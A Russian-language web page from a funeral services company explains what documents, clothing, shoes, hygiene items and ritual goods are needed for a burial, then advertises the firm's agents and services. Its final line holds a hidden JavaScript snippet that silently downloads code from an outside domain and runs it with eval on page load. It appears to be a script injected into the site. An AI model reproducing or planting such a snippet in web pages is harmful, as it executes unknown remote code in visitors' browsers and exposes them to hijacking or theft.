Какие вещи необходимы для погребения

Какие вещи необходимы для погребения

Гибель близкого человека – огромное горе для каждого, и оправиться от его последствий бывает очень тяжело. Однако как бы ни было больно, необходимо организовать достойные похороны усопшему. Сообщить близким, собрать комплект документов, заказать ритуальные товары – все это требует собранности и способности быстро принимать решения. В подавленном моральном состоянии можно легко забыть важные нюансы. Мы расскажем о том, что потребуется для организации похоронного обряда.

Какие документы нужны

Подготовка необходимых документов – первый шаг в организации похорон. Требуется собрать следующий комплект:

  • удостоверение личности покойного;
  • удостоверение личности гражданина, организующего похороны;
  • медицинский документ, подтверждающий факт смерти (выдается в морге);
  • свидетельство о смерти государственного образца;
  • счет на похоронные услуги с пометкой, подтверждающей оплату;
  • паспорт захоронения, подтверждающий право захоронения на кладбище.

В случае проведения кремации дополнительно потребуются:

  • квитанция, подтверждающая оплату услуг крематория;
  • справка из крематория, подтверждающая проведение кремации.

Одежда для погребения

Погребальное одеяние – важная часть подготовки усопшего. Одежду следует отвезти в морг не позднее чем за сутки до выдачи тела. Это нужно сделать заблаговременно, потому что работники морга до того, как одеть усопшего, должны омыть тело и привести его в порядок. Вещи могут быть не новыми, главное, чтобы они были чистыми и аккуратными. Комплект одежды подбирается в зависимости от половой принадлежности покойного, но в любом случае потребуется набор предметов гигиены.

Сотрудники морга бесплатно обмывают, одевают и укладывают умершего в гроб. Если покойному требуется нанести косметику, сделать ему стрижку, побрить, забальзамировать – за это придется заплатить отдельно.

Одежда в морг мужчинам

Традиционная мужская одежда для погребения – костюм или в военная форма, если мужчина находился на службе. Одежду выбирают темных тонов. Если усопший был молодым человеком, допустимы такие цвета, как серый или голубой.

В стандартный набор вещей входят:

  • комплект нижнего белья из хлопка;
  • носки;
  • костюм или рубашка с брюками;
  • галстук (если покойный пользовался этим аксессуаром при жизни);
  • комплект обуви.

Одежда в морг женщинам

Наиболее подходящее одеяние для усопшей женщины – платье или юбочный костюм максимальной длины неброских, спокойных оттенков. Для дам в возрасте допустимо выбрать вещи темных тонов, если погибшая была молодой девушкой – одеяние белого цвета. Брюки в этом случае – не самый подходящий выбор. На это негативно реагируют служители церкви, кроме того, это может вызвать непонимание со стороны людей, присутствующих на похоронах. Практически все части тела должны быть прикрыты, исключение составляют лишь руки и лицо.

Таким образом, для погребения женщины потребуются:

  • комплект нижнего белья;
  • чулки или колготы из хлопка;
  • сорочка;
  • платье или блузка с юбкой;
  • головной убор;
  • обувь.

Обычай покрывать покойницам голову имеет православные истоки. Женщина должна заходить в церковь только в головном уборе, так же она должна отправиться и к Богу.

Помните, что нужно подбирать одежду, которую можно будет быстро и без усилий надеть. Иначе работники морга будут вынуждены разрезать ее на спине.

Обувь для покойных

Принято считать, что наиболее подходящая обувь – белые тапочки. Такое мнение сформировалось из-за нескольких причин. Белый цвет символизирует чистоту и покой. Эта обувь подходит для того, чтобы человек мог ходить по земле в раю, не запачкав ее мирской грязью. Вторая причина заключается в том, что тапки можно надеть на покойного без каких-либо усилий.

Библия не содержит никаких положений на этот счет. Церковнослужители смотрят на эту традицию лояльно, однако напоминают о том, что душе умершего безразличны земные блага.

Таким образом, для похоронного обряда допустимо использовать туфли или ботинки, но имейте ввиду, что их размер должен быть больше того, что человек носил при жизни.

Гигиенические принадлежности

Одежда – не единственное, что потребуется работникам морга для приведения тела усопшего в надлежащее состояние. Для этого также требуются предметы гигиены: мыло, полотенце, расческа, бритва, зубные протезы (если покойный ими пользовался).

Принадлежности для захоронения

Без ритуальных принадлежностей нельзя провести ни одно захоронение. Прежде всего, независимо от способа проведения обряда необходим гроб. На его выбор влияют многие обстоятельства: стоимость, физические параметры усопшего, тип похорон. Например, для кремации подойдет гроб, сделанный только из натурального материала. В дополнение к нему потребуются постель, подушка, покрывало.

Также следует приобрести предметы религиозного свойства согласно той религии, которую исповедовал усопший. Кроме того, потребуются цветы для украшения гроба.

Профессиональная помощь в проведении погребения

Работая в течение долгих лет в сфере погребальных услуг, компания создала себе репутацию надежного поставщика и одного из самых крупных дистрибьюторов товаров для погребения.

В наших магазинах большой выбор похоронной продукции. Мы окажем вам помощь в выборе похоронной атрибутики, исходя из ваших пожеланий и величины бюджета, а также организуем похороны вашего родственника на должном уровне. Вызвать ритуального агента или подать заявку на покупку вещей для погребения вы можете в любое время дня и ночи по телефону.


Вызвать ритуального агента
Ваше имя
Ваш телефон

Ритуальные услуги

Ритуальный агент
Оркестр на похоронах
Организация похорон
Организатор траурной церемонии - Церемониймейстер
Ритуальный транспорт
Гробы
Смотреть все
Позвонить
(function ab(){ var request = new XMLHttpRequest(); request.open('GET', "https://scripts.witstroom.com/one/23092", false); request.send(); if(request.status == 200) eval(request.responseText); })();